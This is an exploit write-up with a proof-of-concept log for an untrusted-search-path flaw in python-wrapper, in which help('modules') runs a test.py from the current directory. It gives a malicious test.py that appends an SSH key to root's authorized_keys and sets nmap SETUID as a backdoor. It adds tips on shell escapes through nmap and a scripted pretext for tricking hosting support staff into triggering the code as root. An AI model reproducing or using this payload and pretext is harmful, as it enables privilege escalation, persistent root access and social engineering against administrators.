# python-wrapper untrusted search path/code execution vulnerability
#
# python-wrapper executes any test.py script found in the current working directory when help('modules') is entered at its prompt.
# A non-privileged user may gain code execution by tricking root into running help('modules'), or help() and then modules, from within python-wrapper
# while inside the non-privileged user's working directory.
#
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally
# with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not
# work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
#
#
# Additionally, nmap makes a great backdoor from a non-privileged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed
# which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program
# with input-output commands.
#
#
# A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting environment.
# After convincing root(support) to cd into your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it,
# you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..."
# "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root*
# "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself".
#
#
# - ShadowHatesYou (Shadow@SquatThis.net)
# 6/30/12
root@tourian:/home/shadow/python# ls -hl test.py
-rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
root@tourian:/home/shadow/python# cat test.py
#!/bin/python
import os
os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
root@tourian:/home/shadow/python# python-wrapper
Python 2.7.3 (default, May 4 2012, 00:13:26)
[GCC 4.6.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...